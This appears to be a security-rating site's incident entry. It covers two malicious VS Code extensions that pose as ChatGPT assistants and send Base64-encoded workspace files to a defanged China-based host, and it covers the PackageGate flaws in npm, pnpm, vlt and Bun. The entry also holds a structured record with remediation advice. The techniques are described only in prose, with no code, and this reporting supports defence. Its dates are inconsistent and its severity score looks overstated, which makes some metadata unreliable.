Malicious VS Code Extensions Exfiltrate Developer Data to China-Based Servers
Cybersecurity researchers have uncovered two malicious Visual Studio Code (VS Code) extensions masquerading as AI-powered coding assistants while secretly harvesting developer data and transmitting it to servers in China. The extensions, still available on the official Visual Studio Marketplace, have amassed a combined 1.5 million installs:
- ChatGPT - 中文版 (whensunset.chatgpt-china) – 1.34 million installs
- ChatGPT - ChatMoss (CodeMoss) (zhukunpeng.chat-moss) – 151,751 installs
Dubbed MaliciousCorgi by Koi Security, the extensions function as advertised providing autocomplete suggestions and code error explanations while covertly exfiltrating data. Every opened file and code modification is encoded in Base64 and sent to a China-based server (aihao123[.]cn) without user consent. The malware also includes a real-time monitoring feature, remotely triggered to exfiltrate up to 50 workspace files per session.
Additionally, the extensions embed a hidden zero-pixel iframe loading four Chinese analytics SDKs Zhuge.io, GrowingIO, TalkingData, and Baidu Analytics to fingerprint devices and build detailed user profiles.
JavaScript Package Managers Vulnerable to Supply Chain Attacks
In a separate disclosure, Koi Security identified six zero-day vulnerabilities (collectively named PackageGate) in JavaScript package managers npm, pnpm, vlt, and Bun that bypass security controls designed to prevent malicious script execution during package installation. These flaws undermine defenses like --ignore-scripts and lockfile integrity checks, which were introduced after the Shai-Hulud worm exploited postinstall scripts to hijack npm tokens.
Following responsible disclosure, fixes were implemented in:
- pnpm (v10.26.0) – Tracked as CVE-2025-69264 (CVSS 8.8) and CVE-2025-69263 (CVSS 7.5)
- vlt (v1.0.0-rc.10)
- Bun (v1.3.5)
However, npm has declined to patch the issue, stating that users are responsible for vetting package content. GitHub, npm’s parent company, confirmed it is actively addressing the flaw but emphasized that git dependencies inherently trust repository contents, including configuration files. GitHub has also reinforced supply chain security measures, including deprecating legacy tokens, enforcing shorter expiration for granular tokens, and removing 2FA bypass options for local package publishing.
As of September 2025, organizations remain advised to disable scripts and commit lockfiles, though researchers warn these measures alone may not fully mitigate risks until PackageGate is resolved.
Source: https://thehackernews.com/2026/01/malicious-vs-code-ai-extensions-with-15.html
npm, Inc. cybersecurity rating report: https://www.rankiteo.com/company/npm-inc-
Microsoft Visual Studio cybersecurity rating report: https://www.rankiteo.com/company/microsoft-visual-studio
"id": "NPMMIC1769475520",
"linkid": "npm-inc-, microsoft-visual-studio",
"type": "Vulnerability",
"date": "9/2025",
"severity": "100",
"impact": "5",
"explanation": "Attack threatening the organization's existence"{'affected_entities': [{'customers_affected': '1.5 million',
'industry': 'Software Development',
'location': 'Global',
'name': 'VS Code Marketplace Users',
'size': '1.5 million installs (combined)',
'type': 'Developers'},
{'industry': 'Software Development',
'location': 'Global',
'name': 'npm Users',
'type': 'Developers'},
{'industry': 'Software Development',
'location': 'Global',
'name': 'pnpm Users',
'type': 'Developers'},
{'industry': 'Software Development',
'location': 'Global',
'name': 'vlt Users',
'type': 'Developers'},
{'industry': 'Software Development',
'location': 'Global',
'name': 'Bun Users',
'type': 'Developers'}],
'attack_vector': ['Malicious Extensions',
'Zero-Day Vulnerabilities in Package Managers'],
'data_breach': {'data_encryption': 'Base64 encoding (not encryption)',
'data_exfiltration': 'Base64-encoded files sent to '
'aihao123[.]cn',
'personally_identifiable_information': 'Device fingerprints, '
'user profiles (via '
'Zhuge.io, GrowingIO, '
'TalkingData, Baidu '
'Analytics)',
'sensitivity_of_data': 'High (developer codebases, PII via '
'analytics SDKs)',
'type_of_data_compromised': ['Workspace files',
'Code modifications',
'Device fingerprints',
'User profiles']},
'date_publicly_disclosed': '2025-09',
'description': 'Cybersecurity researchers uncovered two malicious Visual '
'Studio Code (VS Code) extensions masquerading as AI-powered '
'coding assistants while secretly harvesting developer data '
'and transmitting it to servers in China. Additionally, six '
'zero-day vulnerabilities in JavaScript package managers (npm, '
'pnpm, vlt, and Bun) were identified, bypassing security '
'controls designed to prevent malicious script execution '
'during package installation.',
'impact': {'brand_reputation_impact': 'Potential erosion of trust in VS Code '
'Marketplace and JavaScript package '
'managers',
'data_compromised': 'Developer workspace files, code '
'modifications, device fingerprints, user '
'profiles',
'identity_theft_risk': 'High (device fingerprinting and user '
'profiling)',
'operational_impact': 'Potential unauthorized access to sensitive '
'codebases and developer environments',
'systems_affected': ['VS Code Extensions',
'npm',
'pnpm',
'vlt',
'Bun']},
'investigation_status': 'Ongoing (malicious extensions still available; npm '
'unpatched)',
'lessons_learned': 'Need for stricter vetting of VS Code extensions and '
'package manager security controls. Importance of '
'disabling scripts and committing lockfiles despite '
'inherent risks.',
'motivation': ['Data Theft', 'Supply Chain Compromise'],
'post_incident_analysis': {'corrective_actions': ['Stricter review processes '
'for VS Code extensions.',
'Patching vulnerabilities '
'in package managers (pnpm, '
'vlt, Bun).',
'Enhanced supply chain '
'security measures by '
'GitHub/npm.'],
'root_causes': ['Lack of rigorous vetting for VS '
'Code extensions on the official '
'marketplace.',
'Zero-day vulnerabilities in '
'JavaScript package managers '
'bypassing security controls.',
'Inherent trust in git '
'dependencies and package '
'contents.']},
'recommendations': ['Remove or avoid installing the malicious VS Code '
'extensions (whensunset.chatgpt-china, '
'zhukunpeng.chat-moss).',
'Update pnpm (v10.26.0+), vlt (v1.0.0-rc.10+), and Bun '
'(v1.3.5+) to patched versions.',
'Disable scripts in package managers and commit '
'lockfiles.',
'Monitor for unauthorized data exfiltration from '
'development environments.',
'Enforce shorter token expiration and remove 2FA bypass '
'options for local package publishing.'],
'references': [{'source': 'Koi Security'}, {'source': 'GitHub (npm)'}],
'response': {'containment_measures': ['Removal of malicious extensions '
'(pending)',
'Patches for pnpm, vlt, and Bun'],
'remediation_measures': ['Disabling scripts in package managers',
'Committing lockfiles',
'Deprecating legacy tokens by GitHub'],
'third_party_assistance': 'Koi Security (research and '
'disclosure)'},
'title': 'Malicious VS Code Extensions Exfiltrate Developer Data to '
'China-Based Servers and JavaScript Package Managers Vulnerable to '
'Supply Chain Attacks',
'type': ['Supply Chain Attack', 'Data Exfiltration'],
'vulnerability_exploited': ['CVE-2025-69264 (CVSS 8.8)',
'CVE-2025-69263 (CVSS 7.5)',
'PackageGate Vulnerabilities']}